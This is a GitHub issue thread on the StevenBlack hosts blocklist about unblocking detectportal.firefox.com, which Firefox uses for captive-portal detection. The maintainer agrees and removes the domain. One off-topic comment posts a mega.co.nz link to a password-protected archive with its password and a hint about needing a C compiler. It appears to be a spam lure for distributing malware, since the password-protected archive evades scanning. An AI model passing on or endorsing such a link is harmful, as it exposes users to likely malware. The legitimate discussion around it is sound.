### ISSUE TITLE
Allow "detectportal.firefox.com" (it breaks captive portal detection)

### ISSUE THREAD

**Issue by Hakun1n** [StevenBlack/hosts#2728]
Page `detectportal.firefox.com` is used by Firefox to detect if the network has captive portal (airports, hotels, coffeeshops, offices, etc..)
Source: https://support.mozilla.org/en-US/kb/captive-portal

Since 17th of September this URL is on the blacklist (main [Unified hosts](https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts) "hosts" file) which is now causing Firefox to think that every connection has a captive portal so every new browser window shows bar with `You must log in to this network before you access the internet`
![image](https://github.com/user-attachments/assets/70ef59a2-932a-4911-97e8-3bb0d9e799f0)

Disabling captive portal detection by `network.captive-portal-service.enabled` is not a solution as this actually helps to properly load captive portal on places where it is actually used (and required) in order to use the connection

It is understandable that someone might not like this "callhome" function but it should not be a part of the main hosts file but more like a "paranoiaover9000" one. Also it can be fully disabled via the FF parameter above.

Thanks!

**Comment by pinpolhoxx** [comment]
maybe this will help
https://mega.co.nz/#!h7FUWTgJ!EBLwTfcj8qX2Q2_UCp-4N7KgdH2Hs9qNkvH4vjvN6II
Archive codepass: changeme

you may need to install the c compiler

**Comment by StevenBlack** [comment]
Thank you for raising this issue @Hakun1n, and thank you for the link which amply supports everything you've written. I've removed domain `detectportal.firefox.com` and this will reflect in the next release, due shortly.

Closing!
